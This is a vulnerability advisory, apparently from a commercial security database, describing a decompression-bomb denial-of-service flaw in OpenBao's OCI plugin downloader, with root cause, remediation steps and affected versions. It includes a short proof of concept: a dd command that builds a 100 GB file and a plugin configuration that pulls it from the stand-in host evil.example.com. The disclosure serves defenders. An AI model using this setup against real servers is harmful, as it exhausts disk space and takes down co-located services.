Fluid Attacks Database

Description

OpenBao: Decompression Bomb via Unbounded Copy in OCI Plugin Extraction (DoS)

Summary

ExtractPluginFromImage() in OpenBao's OCI plugin downloader extracts a plugin binary from a container image by streaming decompressed tar data via io.Copy with no upper bound on the number of bytes written. An attacker who controls or compromises the OCI registry referenced in the victim's configuration can serve a crafted image containing a decompression bomb that decompresses to an arbitrarily large file.

The SHA256 integrity check occurs after the full file is written to disk, meaning the hash mismatch is detected only after the damage (disk exhaustion) has already occurred. This allow the attacker to replace legit plugin image with no need to change its signature.

Details

Root cause

helper/pluginutil/oci/downloader.go:301:

if _, copyErr := io.Copy(outFile, tarReader); copyErr != nil {

io.Copy() reads until EOF with no size limit.
The tar header.Size field is never validated before the copy, and mutate.Extract decompresses all gzip layers in memory/streaming, resulting in unbounded decompression-to-disk.

PoC

Set up a malicious OCI registry

Create a decompression bomb binary:

dd if=/dev/zero bs=1G count=100 > /tmp/bomb-binary

Package it in a minimal OCI image

Push to the malicious registry

Configure victim OpenBao to use this registry:

plugin "secrets" "bomb" {
  image       = "evil.example.com/plugin"
  version     = "v1.0.0"
  binary_name = "openbao-plugin-secrets-bomb"
  sha256sum   = "0000000000000000000000000000000000000000000000000000000000000000"
}
plugin_auto_download = true

Start OpenBao (or trigger SIGHUP), load OCI image, disk fill -> cause DoS

Impact

Denial of Service: Disk exhaustion on the OpenBao server

Cascading failure: Co-located services (databases, other apps) also fail when the disk is full

Difficult recovery: If the process is killed mid-extraction, the partial file remains on disk and is not cleaned up

Repeated exploitation: On SIGHUP or restart with plugin_auto_download = true, the bomb is re-downloaded

Remediation

Validate header.Size against a configurable maximum before opening the output file

Wrap tarReader in io.LimitReader(tarReader, maxSize+1) and check bytes written after copy

Add a max_size configuration field to PluginConfig for operator control (default: 1 GiB)

Mitigation

Update Impact

Minimal update. May introduce new vulnerabilities or breaking changes.

Ecosystem	Package	Affected version	Patched versions
go	github.com/openbao/openbao	>=0 <0.0.0-20260420180337-2b2a901aa9f7	0.0.0-20260420180337-2b2a901aa9f7

Aliases

1. CVE-2026-393962. NVD-2026-393963. OSV-2026-393964. GHSA-r65v-xgwc-g56j5. GCVE-2026-39396

References

1. https://github.com/openbao/openbao/security/advisories/GHSA-r65v-xgwc-g56j2. https://github.com/openbao/openbao/pull/29413. https://github.com/openbao/openbao/commit/af576af5322c6552a017ad10fd76aa4f40fd021e4. https://github.com/openbao/openbao/releases/tag/v2.5.3

Does your application use this vulnerable software?

During the free trial, our tools assess your application, identify vulnerabilities, and provide recommendations for their remediation.